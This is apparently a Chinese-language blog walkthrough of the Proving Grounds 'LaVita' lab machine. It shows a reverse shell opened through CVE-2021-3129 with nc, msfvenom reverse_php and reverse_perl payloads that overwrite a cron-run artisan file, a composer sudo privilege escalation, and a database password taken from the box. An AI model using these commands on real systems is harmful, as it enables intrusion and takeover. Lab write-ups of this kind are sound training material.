临渊羡鱼

退而结网

0%

Proving Grounds Practice - LaVita

Posted on In , ,
Proving Grounds Practice Lab中LaVita打靶过程记录

Diffculty

medium

scan

1
2
3
4
5
6
[*] ssh found on tcp/22.
    OpenSSH 8.4p1 


[*] http found on tcp/80.
     Apache/2.4.56 (Debian)

80

点击demo进入demo登录页面

注册一个账号admin:adminadmin, 登录进入后可以上传文件,上传图片后,展示在下方ImageList列表中,点击链接可以查看,尝试把php webshell改成png后台,无法上传成功,同时发现下面的imglist变空了,刚开始以为是上传了恶意文件之后,会自动把所有文件删除,实际上是有定时任务每隔一分钟清除images文件夹下的所有图片。

刷新之前上传的图片页面, 404, 可以看到CMS: Laravel 8.4.0

foothold

searchsploit 搜索 laravel, 发现8.4.2 debug mode下有rce漏洞,先开启debug mode, 开启之后未ENABLED状态,但是代码利用不成功

根据github链接, cve编号是 CVE-2021-3129, 找到 https://github.com/0x0d3ad/CVE-2021-3129

克隆执行利用代码,成功拿到反弹shell

1
2
3
4
5
6
└─$ python CVE-2021-3129.py http://192.168.212.38 --cmd "nc 192.168.45.234 4444 -e /bin/bash"
[+] Generating PHAR payload for command: nc 192.168.45.234 4444 -e /bin/bash
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
1
2
3
4
5
rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.38] 56074
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

上传linpeas执行,发现用户除了roo外还有skunk

1
2
3
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
skunk:x:1001:1001::/home/skunk:/bin/bash

发现mysql 凭证

连接mysql, 但是表里都是空的, 只有users中有一个刚刚注册的admin账号

1
2
3
4
5
6
7
8
9
10
11
12
13
mysql -ulavita -Dlavita -psdfquelw0kly9jgbx92
MariaDB [lavita]> show tables
show tables;
+------------------+
| Tables_in_lavita |
+------------------+
| failed_jobs      |
| migrations       |
| password_resets  |
| sessions         |
| users            |
+------------------+
5 rows in set (0.000 sec)

foothold2

上传pspy执行收集定时任务,发现UID=1001定期清理图片文件

文件aetisan所属用户是当前用户,直接 msfvenom -p php/reverse_php LHOST=192.168.45.234 LPORT=80 -f raw -o test.php 生成反弹shell文件,上传后覆盖artisan文件

1
2
ls -al artisan
-rwxr-xr-x 1 www-data www-data 1885 Feb 16 10:26 artisan

稍等片刻,得到skunk的shell

1
2
3
4
5
6
7
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.38] 55570
id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
whoami
skunk
1
2
3
4
5
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.38] 54526
id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)

escalation

skunk可以在不需要密码的情况下执行composer, 在https://gtfobins.github.io/gtfobins/composer/找到利用方法,成功获取shell

1
2
3
4
5
6
7
sudo -l
Matching Defaults entries for skunk on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User skunk may run the following commands on debian:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
1
2
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >/var/www/html/lavita/composer.json
sudo composer --working-dir\=/var/www/html/lavita * run-script x

小插曲: 测试发现php/reverse_php生成的反弹shell文件是无法升级成交互式shell的,看了下payload说明,reverse_php确实没有说是interactive, which perl 查一下机器上perl用 reverse_perl msfvenom -p php/reverse_perl LHOST=192.168.45.234 LPORT=80 -f raw -o test.php重新生成payload文件,覆盖aetisan, 新获得的shell可以通过 python -c 'import pty; pty.spawn(*/bin/bash")'升级成交互式shell, composer提权过程需要手动敲一下回车,切换为交互式shell之后才成功。